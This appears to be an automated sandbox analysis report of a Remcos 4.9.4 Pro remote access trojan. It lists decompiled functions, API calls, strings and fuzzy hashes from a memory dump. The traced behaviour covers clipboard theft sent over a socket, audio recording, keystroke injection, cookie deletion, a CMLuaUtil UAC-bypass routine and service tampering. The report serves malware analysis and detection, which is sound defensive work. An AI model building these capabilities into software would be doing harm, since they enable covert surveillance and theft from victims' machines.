                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02B19A0D
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02B19A21
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02B19A37
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02B19A54
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02B19A6F
                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 02B19A8B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputSend
                                      • String ID:
                                      • API String ID: 3431551938-0
                                      • Opcode ID: e4a501d54be48a91b3e7df35ee58ce5326afaacbce48991f2f33c4c81ac5a534
                                      • Instruction ID: 9cb40f3dcf7a90fcc99c774c8f2611f020f2d314fa27d7f7ebba52acf85cff5b
                                      • Opcode Fuzzy Hash: e4a501d54be48a91b3e7df35ee58ce5326afaacbce48991f2f33c4c81ac5a534
                                      • Instruction Fuzzy Hash: 0A318131558348AEE311CF51D941BEBBBDCEF88B54F40080EF6809A1C1D3A2A5C98BA7
                                      Function 02B16940 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32 ref: 02B16941
                                      • EmptyClipboard.USER32 ref: 02B1694F
                                      • CloseClipboard.USER32 ref: 02B16955
                                      • OpenClipboard.USER32 ref: 02B1695C
                                      • GetClipboardData.USER32(0000000D), ref: 02B1696C
                                      • GlobalLock.KERNEL32(00000000), ref: 02B16975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02B1697E
                                      • CloseClipboard.USER32 ref: 02B16984
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                      • String ID:
                                      • API String ID: 2172192267-0
                                      • Opcode ID: f25d797f208ff29cc3bb4334509499867cc52d1cb9d57a673299ff61c4f9bed1
                                      • Instruction ID: 33e116f4a56dc2a9be54fc842b2bfced44f78fbdcdce3099d437552316685d8f
                                      • Opcode Fuzzy Hash: f25d797f208ff29cc3bb4334509499867cc52d1cb9d57a673299ff61c4f9bed1
                                      • Instruction Fuzzy Hash: 92017132654710DFC728BB75D84C7AE7BAAEF84781F8048EDE50A871C0DF348854CAA1
                                      Function 02B50A25 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 25463946b00dffe3cd812b67394d4a2028c8f67d460a200a56d704e2c6177031
                                      • Instruction ID: dd9e0a2c7e8bc57d7d8ab34601137c58da9cc221e579ac326203af72e8f87dc9
                                      • Opcode Fuzzy Hash: 25463946b00dffe3cd812b67394d4a2028c8f67d460a200a56d704e2c6177031
                                      • Instruction Fuzzy Hash: 8761E071D00215AFDB20EF68C881B9ABBF5EB09724F1449EAED54EF241EB709D41CB90
                                      Function 02B4B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,02B4BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 02B4B3FE
                                      • __fassign.LIBCMT ref: 02B4B479
                                      • __fassign.LIBCMT ref: 02B4B494
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 02B4B4BA
                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,02B4BB31,00000000,?,?,?,?,?,?,?,?,?,02B4BB31,?), ref: 02B4B4D9
                                      • WriteFile.KERNEL32(?,?,00000001,02B4BB31,00000000,?,?,?,?,?,?,?,?,?,02B4BB31,?), ref: 02B4B512
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 42d96976803e0c1f1c2901e39d31d8ffbd266216987859f56166e24e09df7665
                                      • Instruction ID: 21d0093d8991973ba68c92e5b8420de12c37c645315c118a77d769ad7404259d
                                      • Opcode Fuzzy Hash: 42d96976803e0c1f1c2901e39d31d8ffbd266216987859f56166e24e09df7665
                                      • Instruction Fuzzy Hash: CD51A171D00209AFDB10CFA8D895AEEBBF8EF08304F14459AEA55E7281DB30E951CB60
                                      Function 02B01D0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      • _strftime.LIBCMT ref: 02B01D50
                                        • Part of subcall function 02B01A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02B01AD9
                                      • waveInUnprepareHeader.WINMM(02B72A88,00000020,00000000,?), ref: 02B01E02
                                      • waveInPrepareHeader.WINMM(02B72A88,00000020), ref: 02B01E40
                                      • waveInAddBuffer.WINMM(02B72A88,00000020), ref: 02B01E4F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                      • String ID: %Y-%m-%d %H.%M$.wav
                                      • API String ID: 3809562944-3597965672
                                      • Opcode ID: a1bcfa990997c42594ff5c518f9972ef43227a135c4b9f82e422a6b47e132e2f
                                      • Instruction ID: 5da2923b564fd08fbd47018b3bc88c6051e68beaef4b79013f5ce5a61e4bb746
                                      • Opcode Fuzzy Hash: a1bcfa990997c42594ff5c518f9972ef43227a135c4b9f82e422a6b47e132e2f
                                      • Instruction Fuzzy Hash: 2E31A2319543009FD32AEB24D895A9E7BEAFB44350F4048A9E5AD931E0EF709919CF92
                                      Function 02B0BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02B135CA
                                        • Part of subcall function 02B135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02B135E7
                                        • Part of subcall function 02B135A6: RegCloseKey.KERNEL32(?), ref: 02B135F2
                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 02B0BF6B
                                      • PathFileExistsA.SHLWAPI(?), ref: 02B0BF78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                      • API String ID: 1133728706-4073444585
                                      • Opcode ID: da3e52705d9059a545200f8262d85f1b1c2ac69452f031736a2079ddf77a7d82
                                      • Instruction ID: e79210b67aabb919f985e522965e4ce2c022c7e62ff0fa423ba4b9b2671b861d
                                      • Opcode Fuzzy Hash: da3e52705d9059a545200f8262d85f1b1c2ac69452f031736a2079ddf77a7d82
                                      • Instruction Fuzzy Hash: BB219371A50219AADB1AF7B4CCDADFE7B2AAF10304F8400D9E906671D0EF649949CFD1
                                      Function 02B56B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c07c2ffca774b67ca410ad648deaf6acdd6a40fa39fa99bf3186f5730ca3a87
                                      • Instruction ID: 335d6f143cb36ae2ed878741c07fe623536cd0ac5f2afa5ce9ac824f3e77fa0c
                                      • Opcode Fuzzy Hash: 8c07c2ffca774b67ca410ad648deaf6acdd6a40fa39fa99bf3186f5730ca3a87
                                      • Instruction Fuzzy Hash: 2811B172904625BBDB212F768C84F6F7BADEF81774B404A95FC11DB250DE348841DAA0
                                      Function 02B1B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02B1B3A7
                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 02B1B3BD
                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 02B1B3D6
                                      • InternetCloseHandle.WININET(00000000), ref: 02B1B41C
                                      • InternetCloseHandle.WININET(00000000), ref: 02B1B41F
                                      Strings
                                      • http://geoplugin.net/json.gp, xrefs: 02B1B3B7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpen$FileRead
                                      • String ID: http://geoplugin.net/json.gp
                                      • API String ID: 3121278467-91888290
                                      • Opcode ID: 854b924130ec9a17b802a046cd469812ac5a3c0d7d440cae2eae59688b432a1e
                                      • Instruction ID: f1198bf8862b04e8c5a0de5a1d020a22d75292fcd08c495f90bd8db1313b2001
                                      • Opcode Fuzzy Hash: 854b924130ec9a17b802a046cd469812ac5a3c0d7d440cae2eae59688b432a1e
                                      • Instruction Fuzzy Hash: 4411E7315063216BD634AB259C89EBF7FADEF85764F44086DF80593180DB649C48CAF2
                                      Function 02B50EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B50C41: _free.LIBCMT ref: 02B50C6A
                                      • _free.LIBCMT ref: 02B50F48
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B50F53
                                      • _free.LIBCMT ref: 02B50F5E
                                      • _free.LIBCMT ref: 02B50FB2
                                      • _free.LIBCMT ref: 02B50FBD
                                      • _free.LIBCMT ref: 02B50FC8
                                      • _free.LIBCMT ref: 02B50FD3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction ID: 24198d243bcb3d58ae0bfa3c32327865a6a336b1368b597fbdd44e30390e4fdc
                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction Fuzzy Hash: B8119631540714BAD921BB70CC85FCB779EEF0A702F444C54AEED6A050DAB4B9086F50
                                      Function 02B3A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,02B3A351,02B392BE), ref: 02B3A368
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02B3A376
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02B3A38F
                                      • SetLastError.KERNEL32(00000000,?,02B3A351,02B392BE), ref: 02B3A3E1
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 71b27c5cb110f8808198fb582e136ae3012972fa8547b38ae38e46f34f769595
                                      • Instruction ID: f2a358b40879beae630277bd48528a8a477f24a7e7d8bddeeca834bf6c01597b
                                      • Opcode Fuzzy Hash: 71b27c5cb110f8808198fb582e136ae3012972fa8547b38ae38e46f34f769595
                                      • Instruction Fuzzy Hash: 8D01D83259D7219FA7172A7C6CC4B6B3689EB027F573047A9F51C560D0EF5148149650
                                      Function 02B075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\rundll32.exe), ref: 02B075D0
                                        • Part of subcall function 02B074FD: _wcslen.LIBCMT ref: 02B07521
                                        • Part of subcall function 02B074FD: CoGetObject.OLE32(?,00000024,02B66518,00000000), ref: 02B07582
                                      • CoUninitialize.OLE32 ref: 02B07629
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitializeObjectUninitialize_wcslen
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                      • API String ID: 3851391207-386762680
                                      • Opcode ID: 2da01ef8ee773a9c0e1ca20589e1aa095f7575126b5370005fff207beda4d5c8
                                      • Instruction ID: 14b70468f54c658e9511d9c84f83cb8d17b58c05a518686c37bc140f4527f5d7
                                      • Opcode Fuzzy Hash: 2da01ef8ee773a9c0e1ca20589e1aa095f7575126b5370005fff207beda4d5c8
                                      • Instruction Fuzzy Hash: 0B01C0727006106BF2265B64EC8EF7BFB5CDB45729F14049EF50286081EFA4BC0159A1
                                      Function 02B0BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 02B0BADD
                                      • GetLastError.KERNEL32 ref: 02B0BAE7
                                      Strings
                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 02B0BAA8
                                      • [Chrome Cookies not found], xrefs: 02B0BB01
                                      • [Chrome Cookies found, cleared!], xrefs: 02B0BB0D
                                      • UserProfile, xrefs: 02B0BAAD
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                      • API String ID: 2018770650-304995407
                                      • Opcode ID: 97aeac1c544feb629be84fbc40548e247db2eb6230c9371bcd1552f12c403464
                                      • Instruction ID: 8a029b667eaf79453a1ff5cfd01554ed6418f8971f7a1c2903b1704e5f0fa622
                                      • Opcode Fuzzy Hash: 97aeac1c544feb629be84fbc40548e247db2eb6230c9371bcd1552f12c403464
                                      • Instruction Fuzzy Hash: A901D631A802095B9B0ABBBDCCDB8FE7F2AEB11614B4001D5E813621E4FE564655CED2
                                      Function 02B1CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocConsole.KERNEL32(02B75338), ref: 02B1CDA4
                                      • ShowWindow.USER32(00000000,00000000), ref: 02B1CDBD
                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 02B1CDE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AllocOutputShowWindow
                                      • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                      • API String ID: 2425139147-3065609815
                                      • Opcode ID: 3dc170323deb1ec13427ffc8d8f37196d7fb8864d3c93f1e434a45358711c1c8
                                      • Instruction ID: e1d6b3d2225677ec2cb6e2fda7240b485dee305cbd8fc19888b4fae492627cf3
                                      • Opcode Fuzzy Hash: 3dc170323deb1ec13427ffc8d8f37196d7fb8864d3c93f1e434a45358711c1c8
                                      • Instruction Fuzzy Hash: DB0184B1ED03087AE610FBF49C4EF5D7BBD9B10B41F500892B609AB081DFA496285AA1
                                      Function 02B3AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                      Download Yara Rule
                                      APIs
                                      • __allrem.LIBCMT ref: 02B3AC69
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B3AC85
                                      • __allrem.LIBCMT ref: 02B3AC9C
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B3ACBA
                                      • __allrem.LIBCMT ref: 02B3ACD1
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B3ACEF
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                      • Instruction ID: b9b001a4f70e3c47eadea6a8c56ca10685f549b1e9bb4dadc0ce43bdb00c1fa0
                                      • Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                      • Instruction Fuzzy Hash: 3981EB726007069BD726AF78CC81B9BB3EAEF40324F3445AAE595D7680FF74D9418B50
                                      Function 02B11CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B1179C: SetLastError.KERNEL32(0000000D,02B11D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B11CFA), ref: 02B117A2
                                      • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B11CFA), ref: 02B11D37
                                      • GetNativeSystemInfo.KERNEL32(?,02B0D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B11CFA), ref: 02B11DA5
                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 02B11DC9
                                        • Part of subcall function 02B11CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,02B11DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 02B11CB3
                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 02B11E10
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 02B11E17
                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B11F2A
                                        • Part of subcall function 02B12077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,02B11F37,?,?,?,?,?), ref: 02B120E7
                                        • Part of subcall function 02B12077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02B120EE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                      • String ID:
                                      • API String ID: 3950776272-0
                                      • Opcode ID: f6b66e6a4b17ecb285dbe99e79364204a08ffe0e8ba57e5656a1f175f104b86b
                                      • Instruction ID: 337a82280b732f1fc210f7167936d702801ae65ae02e2b99310eeed5d023a486
                                      • Opcode Fuzzy Hash: f6b66e6a4b17ecb285dbe99e79364204a08ffe0e8ba57e5656a1f175f104b86b
                                      • Instruction Fuzzy Hash: 5C610271631611ABCB109F6DC980B7A7BAAFF84340F8441D9EB0D8B681E7B4D951CBD1
                                      Function 02B458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __cftoe
                                      • String ID:
                                      • API String ID: 4189289331-0
                                      • Opcode ID: 57cf4f5ddb1b3c7462cd5a1f8c25b806bfc76ab8a3991aa24047be83fe5bf657
                                      • Instruction ID: 070b5ae10367c74d353348960caa0bae078adf51876212cbff44838dc90c0288
                                      • Opcode Fuzzy Hash: 57cf4f5ddb1b3c7462cd5a1f8c25b806bfc76ab8a3991aa24047be83fe5bf657
                                      • Instruction Fuzzy Hash: F9514B32900605ABDF359B68CCC0FAE77BAEF59334F9442DAE92592191DF30D500EBA4
                                      Function 02B0A726 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00001388), ref: 02B0A740
                                        • Part of subcall function 02B0A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02B0A74D), ref: 02B0A6AB
                                        • Part of subcall function 02B0A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,02B0A74D), ref: 02B0A6BA
                                        • Part of subcall function 02B0A675: Sleep.KERNEL32(00002710,?,?,?,02B0A74D), ref: 02B0A6E7
                                        • Part of subcall function 02B0A675: CloseHandle.KERNEL32(00000000,?,?,?,02B0A74D), ref: 02B0A6EE
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02B0A77C
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 02B0A78D
                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 02B0A7A4
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 02B0A81E
                                        • Part of subcall function 02B1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,02B66468,?,00000000,00000000,00000000,00000000,00000000), ref: 02B0A927
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                      • String ID:
                                      • API String ID: 3795512280-0
                                      • Opcode ID: 328115eacb554513ed7772e559de828885bbe1e2309da8e4c4a285a7ef5b7a14
                                      • Instruction ID: 0a6209f1f5ac3fd9fe066dbc748373aa40200f465744e60e6d324f26a9b255bc
                                      • Opcode Fuzzy Hash: 328115eacb554513ed7772e559de828885bbe1e2309da8e4c4a285a7ef5b7a14
                                      • Instruction Fuzzy Hash: 31519C716143005BCB1BFB38C8E4ABE7FAB9F80344F4448D9AA87971D0DF2499498B92
                                      Function 02B47571 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 2936374016-3206640213
                                      • Opcode ID: 6604c0c9618d8238911851b5e276efbcd3c04aecfca8f5b56c0d6dce3fccd2cb
                                      • Instruction ID: a5fd259a7fc27e47061c3015e50ab00f7660f019484a3c51f3ce9ae4b8bb80ec
                                      • Opcode Fuzzy Hash: 6604c0c9618d8238911851b5e276efbcd3c04aecfca8f5b56c0d6dce3fccd2cb
                                      • Instruction Fuzzy Hash: 5BD11871910206EBDB288F68C8D4BBAF7B1FF09304F1841D9E645AB255DF359980FBA1
                                      Function 02B10E61 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02B10E6E
                                      • int.LIBCPMT ref: 02B10E81
                                        • Part of subcall function 02B0E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 02B0E0D2
                                        • Part of subcall function 02B0E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 02B0E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 02B10EC1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02B10ECA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B10EE8
                                      • __Init_thread_footer.LIBCMT ref: 02B10F29
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                      • String ID:
                                      • API String ID: 3815856325-0
                                      • Opcode ID: df589e5d3bda7642570d8daa35390c4e5d47cf8298c5daabdfcf9759a221223d
                                      • Instruction ID: b4739bdf8287f17bcacf1f1b06bd4c8161b1bda41d24a728bf0ea082e260addd
                                      • Opcode Fuzzy Hash: df589e5d3bda7642570d8daa35390c4e5d47cf8298c5daabdfcf9759a221223d
                                      • Instruction Fuzzy Hash: 0A213533910514DBCB15FB68E885DAE7BBAEF45320B6009D6E810A72D0DF31AA81CF90
                                      Function 02B1AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,02B1A38E,00000000), ref: 02B1AC88
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,02B1A38E,00000000), ref: 02B1AC9C
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02B1A38E,00000000), ref: 02B1ACA9
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,02B1A38E,00000000), ref: 02B1ACDE
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02B1A38E,00000000), ref: 02B1ACF0
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02B1A38E,00000000), ref: 02B1ACF3
                                      Memory Dump Source
